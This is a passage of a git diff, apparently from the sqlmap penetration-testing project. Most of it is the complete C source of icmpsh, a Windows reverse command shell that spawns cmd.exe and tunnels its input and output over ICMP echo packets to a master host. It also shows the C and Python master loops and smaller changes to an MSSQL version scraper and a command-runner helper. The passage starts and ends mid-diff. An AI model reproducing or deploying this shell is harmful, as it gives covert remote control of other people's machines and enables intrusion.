+ printf("icmpsh - master\n"); + + // create raw ICMP socket + sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP); + if (sockfd == -1) { + perror("socket"); + return -1; + } + + // set stdin to non-blocking + flags = fcntl(0, F_GETFL, 0); + flags |= O_NONBLOCK; + fcntl(0, F_SETFL, flags); + + printf("running...\n"); + while(1) { + + // read data from socket + memset(in_buf, 0x00, IN_BUF_SIZE); + nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1); + if (nbytes > 0) { + // get ip and icmp header and data part + ip = (struct iphdr *) in_buf; + if (nbytes > sizeof(struct iphdr)) { + nbytes -= sizeof(struct iphdr); + icmp = (struct icmphdr *) (ip + 1); + if (nbytes > sizeof(struct icmphdr)) { + nbytes -= sizeof(struct icmphdr); + data = (char *) (icmp + 1); + data[nbytes] = '\0'; + printf("%s", data); + fflush(stdout); + } + + // reuse headers + icmp->type = 0; + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = ip->saddr; + + // read data from stdin + nbytes = read(0, out_buf, OUT_BUF_SIZE); + if (nbytes > -1) { + memcpy((char *) (icmp + 1), out_buf, nbytes); + out_size = nbytes; + } else { + out_size = 0; + } + + icmp->checksum = 0x00; + icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size); + + // send reply + nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr)); + if (nbytes == -1) { + perror("sendto"); + return -1; + } + } + } + } + + return 0; +} + diff --git a/extra/icmpsh/icmpsh-m.pl b/extra/icmpsh/icmpsh-m.pl old mode 100755 new mode 100644 diff --git a/extra/icmpsh/icmpsh-s.c b/extra/icmpsh/icmpsh-s.c index 5c127d84320..c108509774d 100644 --- a/extra/icmpsh/icmpsh-s.c +++ b/extra/icmpsh/icmpsh-s.c @@ -1,346 +1,344 @@ -/* - * icmpsh - simple icmp command shell - * Copyright (c) 2010, Nico Leidecker - * This program is free software: you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation, either version 3 of the License, or - * (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. 
- * - * You should have received a copy of the GNU General Public License - * along with this program. If not, see . - */ - - -#include -#include -#include -#include -#include -#include - -#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) - -#define STATUS_OK 0 -#define STATUS_SINGLE 1 -#define STATUS_PROCESS_NOT_CREATED 2 - -#define TRANSFER_SUCCESS 1 -#define TRANSFER_FAILURE 0 - -#define DEFAULT_TIMEOUT 3000 -#define DEFAULT_DELAY 200 -#define DEFAULT_MAX_BLANKS 10 -#define DEFAULT_MAX_DATA_SIZE 64 - -FARPROC icmp_create, icmp_send, to_ip; - -int verbose = 0; - -int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) -{ - SECURITY_ATTRIBUTES sattr; - STARTUPINFOA si; - HANDLE in_read, out_write; - - memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); - memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); - - // create communication pipes - memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); - sattr.nLength = sizeof(SECURITY_ATTRIBUTES); - sattr.bInheritHandle = TRUE; - sattr.lpSecurityDescriptor = NULL; - - if (!CreatePipe(out_read, &out_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - if (!CreatePipe(&in_read, in_write, &sattr, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { - return STATUS_PROCESS_NOT_CREATED; - } - - // spawn process - memset(&si, 0x00, sizeof(STARTUPINFO)); - si.cb = sizeof(STARTUPINFO); - si.hStdError = out_write; - si.hStdOutput = out_write; - si.hStdInput = in_read; - si.dwFlags |= STARTF_USESTDHANDLES; - - if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { - return STATUS_PROCESS_NOT_CREATED; - } - - CloseHandle(out_write); - CloseHandle(in_read); - - return STATUS_OK; -} - -void usage(char *path) -{ - printf("%s [options] -t target\n", path); - printf("options:\n"); - printf(" -t host host ip address to send ping requests to\n"); - printf(" -r send a single test icmp request and then quit\n"); - printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); - printf(" -o milliseconds timeout in milliseconds\n"); - printf(" -h this screen\n"); - printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); - printf(" before quitting\n"); - printf(" -s bytes maximal data buffer size in bytes (default is 64 bytes)\n\n", DEFAULT_MAX_DATA_SIZE); - printf("In order to improve the speed, lower the delay (-d) between requests or\n"); - printf("increase the size (-s) of the data buffer\n"); -} - -void create_icmp_channel(HANDLE *icmp_chan) -{ - // create icmp file - *icmp_chan = (HANDLE) icmp_create(); -} - -int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) -{ - int rs; - char *temp_in_buf; - int nbytes; - - PICMP_ECHO_REPLY echo_reply; - - temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); - if (!temp_in_buf) { - return TRANSFER_FAILURE; - } - - // send data to remote host - rs = icmp_send( - icmp_chan, - target, - out_buf, - out_buf_size, - NULL, - temp_in_buf, - max_in_data_size + ICMP_HEADERS_SIZE, - timeout); - - // check received data - if (rs > 0) { - echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; - if (echo_reply->DataSize > max_in_data_size) { - nbytes = max_in_data_size; - } else { - nbytes = 
echo_reply->DataSize; - } - memcpy(in_buf, echo_reply->Data, nbytes); - *in_buf_size = nbytes; - - free(temp_in_buf); - return TRANSFER_SUCCESS; - } - - free(temp_in_buf); - - return TRANSFER_FAILURE; -} - -int load_deps() -{ - HMODULE lib; - - lib = LoadLibraryA("ws2_32.dll"); - if (lib != NULL) { - to_ip = GetProcAddress(lib, "inet_addr"); - if (!to_ip) { - return 0; - } - } - - lib = LoadLibraryA("iphlpapi.dll"); - if (lib != NULL) { - icmp_create = GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - lib = LoadLibraryA("ICMP.DLL"); - if (lib != NULL) { - icmp_create = GetProcAddress(lib, "IcmpCreateFile"); - icmp_send = GetProcAddress(lib, "IcmpSendEcho"); - if (icmp_create && icmp_send) { - return 1; - } - } - - printf("failed to load functions (%u)", GetLastError()); - - return 0; -} -int main(int argc, char **argv) -{ - int opt; - char *target; - unsigned int delay, timeout; - unsigned int ip_addr; - HANDLE pipe_read, pipe_write; - HANDLE icmp_chan; - unsigned char *in_buf, *out_buf; - unsigned int in_buf_size, out_buf_size; - DWORD rs; - int blanks, max_blanks; - PROCESS_INFORMATION pi; - int status; - unsigned int max_data_size; - struct hostent *he; - - - // set defaults - target = 0; - timeout = DEFAULT_TIMEOUT; - delay = DEFAULT_DELAY; - max_blanks = DEFAULT_MAX_BLANKS; - max_data_size = DEFAULT_MAX_DATA_SIZE; - - status = STATUS_OK; - if (!load_deps()) { - printf("failed to load ICMP library\n"); - return -1; - } - - // parse command line options - for (opt = 1; opt < argc; opt++) { - if (argv[opt][0] == '-') { - switch(argv[opt][1]) { - case 'h': - usage(*argv); - return 0; - case 't': - if (opt + 1 < argc) { - target = argv[opt + 1]; - } - break; - case 'd': - if (opt + 1 < argc) { - delay = atol(argv[opt + 1]); - } - break; - case 'o': - if (opt + 1 < argc) { - timeout = atol(argv[opt + 1]); - } - break; - case 'r': - status = STATUS_SINGLE; - break; - case 'b': - if (opt + 1 < argc) { - max_blanks = atol(argv[opt + 1]); - } - break; - case 's': - if (opt + 1 < argc) { - max_data_size = atol(argv[opt + 1]); - } - break; - default: - printf("unrecognized option -%c\n", argv[1][0]); - usage(*argv); - return -1; - } - } - } - - if (!target) { - printf("you need to specify a host with -t. 
Try -h for more options\n"); - return -1; - } - ip_addr = to_ip(target); - - // don't spawn a shell if we're only sending a single test request - if (status != STATUS_SINGLE) { - status = spawn_shell(&pi, &pipe_read, &pipe_write); - } - - // create icmp channel - create_icmp_channel(&icmp_chan); - if (icmp_chan == INVALID_HANDLE_VALUE) { - printf("unable to create ICMP file: %u\n", GetLastError()); - return -1; - } - - // allocate transfer buffers - in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); - if (!in_buf || !out_buf) { - printf("failed to allocate memory for transfer buffers\n"); - return -1; - } - memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); - - // sending/receiving loop - blanks = 0; - do { - - switch(status) { - case STATUS_SINGLE: - // reply with a static string - out_buf_size = sprintf(out_buf, "Test1234\n"); - break; - case STATUS_PROCESS_NOT_CREATED: - // reply with error message - out_buf_size = sprintf(out_buf, "Process was not created\n"); - break; - default: - // read data from process via pipe - out_buf_size = 0; - if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { - if (out_buf_size > 0) { - out_buf_size = 0; - rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); - if (!rs && GetLastError() != ERROR_IO_PENDING) { - out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); - } - } - } else { - out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); - } - break; - } - - // send request/receive response - if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { - if (status == STATUS_OK) { - // write data from response back into pipe - WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); - } - blanks = 0; - } else { - // no reply received or error occured - blanks++; - } - - // wait between requests - Sleep(delay); - - } while (status == STATUS_OK && blanks < max_blanks); - - if (status == STATUS_OK) { - TerminateProcess(pi.hProcess, 0); - } - - return 0; -} - +/* + * icmpsh - simple icmp command shell + * Copyright (c) 2010, Nico Leidecker + * This program is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program. If not, see . 
+ */ + + +#include +#include +#include +#include +#include +#include + +#define ICMP_HEADERS_SIZE (sizeof(ICMP_ECHO_REPLY) + 8) + +#define STATUS_OK 0 +#define STATUS_SINGLE 1 +#define STATUS_PROCESS_NOT_CREATED 2 + +#define TRANSFER_SUCCESS 1 +#define TRANSFER_FAILURE 0 + +#define DEFAULT_TIMEOUT 3000 +#define DEFAULT_DELAY 200 +#define DEFAULT_MAX_BLANKS 10 +#define DEFAULT_MAX_DATA_SIZE 64 + +FARPROC icmp_create, icmp_send, to_ip; + +int verbose = 0; + +int spawn_shell(PROCESS_INFORMATION *pi, HANDLE *out_read, HANDLE *in_write) +{ + SECURITY_ATTRIBUTES sattr; + STARTUPINFOA si; + HANDLE in_read, out_write; + + memset(&si, 0x00, sizeof(SECURITY_ATTRIBUTES)); + memset(pi, 0x00, sizeof(PROCESS_INFORMATION)); + + // create communication pipes + memset(&sattr, 0x00, sizeof(SECURITY_ATTRIBUTES)); + sattr.nLength = sizeof(SECURITY_ATTRIBUTES); + sattr.bInheritHandle = TRUE; + sattr.lpSecurityDescriptor = NULL; + + if (!CreatePipe(out_read, &out_write, &sattr, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + if (!SetHandleInformation(*out_read, HANDLE_FLAG_INHERIT, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + + if (!CreatePipe(&in_read, in_write, &sattr, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + + // spawn process + memset(&si, 0x00, sizeof(STARTUPINFO)); + si.cb = sizeof(STARTUPINFO); + si.hStdError = out_write; + si.hStdOutput = out_write; + si.hStdInput = in_read; + si.dwFlags |= STARTF_USESTDHANDLES; + + if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { + return STATUS_PROCESS_NOT_CREATED; + } + + CloseHandle(out_write); + CloseHandle(in_read); + + return STATUS_OK; +} + +void usage(char *path) +{ + printf("%s [options] -t target\n", path); + printf("options:\n"); + printf(" -t host host ip address to send ping requests to\n"); + printf(" -r send a single test icmp request and then quit\n"); + printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); + printf(" -o milliseconds timeout in milliseconds\n"); + printf(" -h this screen\n"); + printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); + printf(" before quitting\n"); + printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE); + printf("In order to improve the speed, lower the delay (-d) between requests or\n"); + printf("increase the size (-s) of the data buffer\n"); +} + +void create_icmp_channel(HANDLE *icmp_chan) +{ + // create icmp file + *icmp_chan = (HANDLE) icmp_create(); +} + +int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) +{ + int rs; + char *temp_in_buf; + int nbytes; + + PICMP_ECHO_REPLY echo_reply; + + temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); + if (!temp_in_buf) { + return TRANSFER_FAILURE; + } + + // send data to remote host + rs = icmp_send( + icmp_chan, + target, + out_buf, + out_buf_size, + NULL, + temp_in_buf, + max_in_data_size + ICMP_HEADERS_SIZE, + timeout); + + // check received data + if (rs > 0) { + echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; + if (echo_reply->DataSize > max_in_data_size) { + nbytes = max_in_data_size; + } else { + nbytes = echo_reply->DataSize; + } + memcpy(in_buf, echo_reply->Data, nbytes); + *in_buf_size = nbytes; + + free(temp_in_buf); + return 
TRANSFER_SUCCESS; + } + + free(temp_in_buf); + + return TRANSFER_FAILURE; +} + +int load_deps() +{ + HMODULE lib; + + lib = LoadLibraryA("ws2_32.dll"); + if (lib != NULL) { + to_ip = GetProcAddress(lib, "inet_addr"); + if (!to_ip) { + return 0; + } + } + + lib = LoadLibraryA("iphlpapi.dll"); + if (lib != NULL) { + icmp_create = GetProcAddress(lib, "IcmpCreateFile"); + icmp_send = GetProcAddress(lib, "IcmpSendEcho"); + if (icmp_create && icmp_send) { + return 1; + } + } + + lib = LoadLibraryA("ICMP.DLL"); + if (lib != NULL) { + icmp_create = GetProcAddress(lib, "IcmpCreateFile"); + icmp_send = GetProcAddress(lib, "IcmpSendEcho"); + if (icmp_create && icmp_send) { + return 1; + } + } + + printf("failed to load functions (%u)", GetLastError()); + + return 0; +} +int main(int argc, char **argv) +{ + int opt; + char *target; + unsigned int delay, timeout; + unsigned int ip_addr; + HANDLE pipe_read, pipe_write; + HANDLE icmp_chan; + unsigned char *in_buf, *out_buf; + unsigned int in_buf_size, out_buf_size; + DWORD rs; + int blanks, max_blanks; + PROCESS_INFORMATION pi; + int status; + unsigned int max_data_size; + + // set defaults + target = 0; + timeout = DEFAULT_TIMEOUT; + delay = DEFAULT_DELAY; + max_blanks = DEFAULT_MAX_BLANKS; + max_data_size = DEFAULT_MAX_DATA_SIZE; + + status = STATUS_OK; + if (!load_deps()) { + printf("failed to load ICMP library\n"); + return -1; + } + + // parse command line options + for (opt = 1; opt < argc; opt++) { + if (argv[opt][0] == '-') { + switch(argv[opt][1]) { + case 'h': + usage(*argv); + return 0; + case 't': + if (opt + 1 < argc) { + target = argv[opt + 1]; + } + break; + case 'd': + if (opt + 1 < argc) { + delay = atol(argv[opt + 1]); + } + break; + case 'o': + if (opt + 1 < argc) { + timeout = atol(argv[opt + 1]); + } + break; + case 'r': + status = STATUS_SINGLE; + break; + case 'b': + if (opt + 1 < argc) { + max_blanks = atol(argv[opt + 1]); + } + break; + case 's': + if (opt + 1 < argc) { + max_data_size = atol(argv[opt + 1]); + } + break; + default: + printf("unrecognized option -%c\n", argv[1][0]); + usage(*argv); + return -1; + } + } + } + + if (!target) { + printf("you need to specify a host with -t. 
Try -h for more options\n"); + return -1; + } + ip_addr = to_ip(target); + + // don't spawn a shell if we're only sending a single test request + if (status != STATUS_SINGLE) { + status = spawn_shell(&pi, &pipe_read, &pipe_write); + } + + // create icmp channel + create_icmp_channel(&icmp_chan); + if (icmp_chan == INVALID_HANDLE_VALUE) { + printf("unable to create ICMP file: %u\n", GetLastError()); + return -1; + } + + // allocate transfer buffers + in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); + out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); + if (!in_buf || !out_buf) { + printf("failed to allocate memory for transfer buffers\n"); + return -1; + } + memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); + memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); + + // sending/receiving loop + blanks = 0; + do { + + switch(status) { + case STATUS_SINGLE: + // reply with a static string + out_buf_size = sprintf(out_buf, "Test1234\n"); + break; + case STATUS_PROCESS_NOT_CREATED: + // reply with error message + out_buf_size = sprintf(out_buf, "Process was not created\n"); + break; + default: + // read data from process via pipe + out_buf_size = 0; + if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { + if (out_buf_size > 0) { + out_buf_size = 0; + rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); + if (!rs && GetLastError() != ERROR_IO_PENDING) { + out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); + } + } + } else { + out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); + } + break; + } + + // send request/receive response + if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { + if (status == STATUS_OK) { + // write data from response back into pipe + WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); + } + blanks = 0; + } else { + // no reply received or error occured + blanks++; + } + + // wait between requests + Sleep(delay); + + } while (status == STATUS_OK && blanks < max_blanks); + + if (status == STATUS_OK) { + TerminateProcess(pi.hProcess, 0); + } + + return 0; +} + diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_ index cd3c62e0960..46a2115cc44 100644 Binary files a/extra/icmpsh/icmpsh.exe_ and b/extra/icmpsh/icmpsh.exe_ differ diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 36fe44982ec..17370fdc001 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -22,7 +22,6 @@ import os import select import socket -import subprocess import sys def setNonBlocking(fd): @@ -37,7 +36,7 @@ def setNonBlocking(fd): fcntl.fcntl(fd, fcntl.F_SETFL, flags) def main(src, dst): - if subprocess.mswindows: + if sys.platform == "nt": sys.stderr.write('icmpsh master can only run on Posix systems\n') sys.exit(255) @@ -76,57 +75,64 @@ def main(src, dst): # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() - while 1: - cmd = '' - - # Wait for incoming replies - if sock in select.select([ sock ], [], [])[0]: - buff = sock.recv(4096) - - if 0 == len(buff): - # Socket remotely closed - sock.close() - sys.exit(0) - - # Packet received; decode and display it - ippacket = decoder.decode(buff) - icmppacket = ippacket.child() - - # If the packet matches, report it to the user - if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): - # Get identifier and sequence number - ident = 
icmppacket.get_icmp_id() - seq_id = icmppacket.get_icmp_seq() - data = icmppacket.get_data_as_string() - - if len(data) > 0: - sys.stdout.write(data) - - # Parse command from standard input - try: - cmd = sys.stdin.readline() - except: - pass - - if cmd == 'exit\n': - return - - # Set sequence number and identifier - icmp.set_icmp_id(ident) - icmp.set_icmp_seq(seq_id) - - # Include the command as data inside the ICMP packet - icmp.contains(ImpactPacket.Data(cmd)) - - # Calculate its checksum - icmp.set_icmp_cksum(0) - icmp.auto_checksum = 1 - - # Have the IP packet contain the ICMP packet (along with its payload) - ip.contains(icmp) - - # Send it to the target host - sock.sendto(ip.get_packet(), (dst, 0)) + while True: + try: + cmd = '' + + # Wait for incoming replies + if sock in select.select([sock], [], [])[0]: + buff = sock.recv(4096) + + if 0 == len(buff): + # Socket remotely closed + sock.close() + sys.exit(0) + + # Packet received; decode and display it + ippacket = decoder.decode(buff) + icmppacket = ippacket.child() + + # If the packet matches, report it to the user + if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): + # Get identifier and sequence number + ident = icmppacket.get_icmp_id() + seq_id = icmppacket.get_icmp_seq() + data = icmppacket.get_data_as_string() + + if len(data) > 0: + sys.stdout.write(data) + + # Parse command from standard input + try: + cmd = sys.stdin.readline() + except: + pass + + if cmd == 'exit\n': + return + + # Set sequence number and identifier + icmp.set_icmp_id(ident) + icmp.set_icmp_seq(seq_id) + + # Include the command as data inside the ICMP packet + icmp.contains(ImpactPacket.Data(cmd)) + + # Calculate its checksum + icmp.set_icmp_cksum(0) + icmp.auto_checksum = 1 + + # Have the IP packet contain the ICMP packet (along with its payload) + ip.contains(icmp) + + try: + # Send it to the target host + sock.sendto(ip.get_packet(), (dst, 0)) + except socket.error as ex: + sys.stderr.write("'%s'\n" % ex) + sys.stderr.flush() + except: + break if __name__ == '__main__': if len(sys.argv) < 3: diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py deleted file mode 100644 index 1f3c36893c5..00000000000 --- a/extra/mssqlsig/update.py +++ /dev/null @@ -1,137 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import os -import re -import urllib2 -import urlparse - -from xml.dom.minidom import Document - -# Path to the XML file with signatures -MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") - -# Url to update Microsoft SQL Server XML versions file from -MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" - -def updateMSSQLXML(): - if not os.path.exists(MSSQL_XML): - errMsg = "[ERROR] file '%s' does not exist. please run the script from it's parent directory." 
% MSSQL_XML - print errMsg - return - - infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL - print infoMsg - - try: - req = urllib2.Request(MSSQL_VERSIONS_URL) - f = urllib2.urlopen(req) - mssqlVersionsHtmlString = f.read() - f.close() - except urllib2.URLError: - __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) - __mssqlHostname = __mssqlPath[1] - - warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname - warnMsg += " check your Internet connection and retry" - print warnMsg - - return - - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) - releasesCount = len(releases) - - # Create the minidom document - doc = Document() - - # Create the base element - root = doc.createElement("root") - doc.appendChild(root) - - for index in xrange(0, releasesCount): - release = releases[index] - - # Skip Microsoft SQL Server 6.5 because the HTML - # table is in another format - if release == "6.5": - continue - - # Create the base element - signatures = doc.createElement("signatures") - signatures.setAttribute("release", release) - root.appendChild(signatures) - - startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) - - if index == releasesCount - 1: - stopIdx = len(mssqlVersionsHtmlString) - else: - stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) - - mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("[7\.0|2000|2005|2008|2008 R2]*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) - - for servicePack, version in servicepackVersion: - if servicePack.startswith(" "): - servicePack = servicePack[1:] - if "/" in servicePack: - servicePack = servicePack[:servicePack.index("/")] - if "(" in servicePack: - servicePack = servicePack[:servicePack.index("(")] - if "-" in servicePack: - servicePack = servicePack[:servicePack.index("-")] - if "*" in servicePack: - servicePack = servicePack[:servicePack.index("*")] - if servicePack.startswith("+"): - servicePack = "0%s" % servicePack - - servicePack = servicePack.replace("\t", " ") - servicePack = servicePack.replace("No SP", "0") - servicePack = servicePack.replace("RTM", "0") - servicePack = servicePack.replace("TM", "0") - servicePack = servicePack.replace("SP", "") - servicePack = servicePack.replace("Service Pack", "") - servicePack = servicePack.replace(" element - signature = doc.createElement("signature") - signatures.appendChild(signature) - - # Create a element - versionElement = doc.createElement("version") - signature.appendChild(versionElement) - - # Give the elemenet some text - versionText = doc.createTextNode(version) - versionElement.appendChild(versionText) - - # Create a element - servicepackElement = doc.createElement("servicepack") - signature.appendChild(servicepackElement) - - # Give the elemenet some text - servicepackText = doc.createTextNode(servicePack) - servicepackElement.appendChild(servicepackText) - - # Save our newly created XML to the signatures file - mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") - doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") - mssqlXml.close() - - infoMsg = "[INFO] done. 
retrieved data parsed and saved into '%s'" % MSSQL_XML - print infoMsg - -if __name__ == "__main__": - updateMSSQLXML() diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt index 717800aa418..4d4caa8f8eb 100644 --- a/extra/runcmd/README.txt +++ b/extra/runcmd/README.txt @@ -1,3 +1,3 @@ -Files in this folder can be used to compile auxiliary program that can -be used for running command prompt commands skipping standard "cmd /c" way. -They are licensed under the terms of the GNU Lesser General Public License. +runcmd.exe is an auxiliary program that can be used for running command prompt +commands skipping standard "cmd /c" way. It is licensed under the terms of the +GNU Lesser General Public License. diff --git a/extra/runcmd/runcmd.exe_ b/extra/runcmd/runcmd.exe_ new file mode 100644 index 00000000000..d3b4bebfe90 Binary files /dev/null and b/extra/runcmd/runcmd.exe_ differ diff --git a/extra/runcmd/windows/README.txt b/extra/runcmd/src/README.txt similarity index 100% rename from extra/runcmd/windows/README.txt rename to extra/runcmd/src/README.txt diff --git a/extra/runcmd/windows/runcmd.sln b/extra/runcmd/src/runcmd.sln similarity index 97% rename from extra/runcmd/windows/runcmd.sln rename to extra/runcmd/src/runcmd.sln index 0770582d092..a70c648d0dc 100644 --- a/extra/runcmd/windows/runcmd.sln +++ b/extra/runcmd/src/runcmd.sln @@ -1,20 +1,20 @@ - -Microsoft Visual Studio Solution File, Format Version 9.00 -# Visual Studio 2005 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|Win32 = Debug|Win32 - Release|Win32 = Release|Win32 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal + +Microsoft Visual Studio Solution File, Format Version 9.00 +# Visual Studio 2005 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/extra/runcmd/windows/runcmd/runcmd.cpp b/extra/runcmd/src/runcmd/runcmd.cpp similarity index 96% rename from extra/runcmd/windows/runcmd/runcmd.cpp rename to extra/runcmd/src/runcmd/runcmd.cpp index ab40a0c218e..743f2a279ef 100644 --- a/extra/runcmd/windows/runcmd/runcmd.cpp +++ b/extra/runcmd/src/runcmd/runcmd.cpp @@ -1,46 +1,46 @@ -/* - runcmd - a program for running command prompt commands - Copyright (C) 
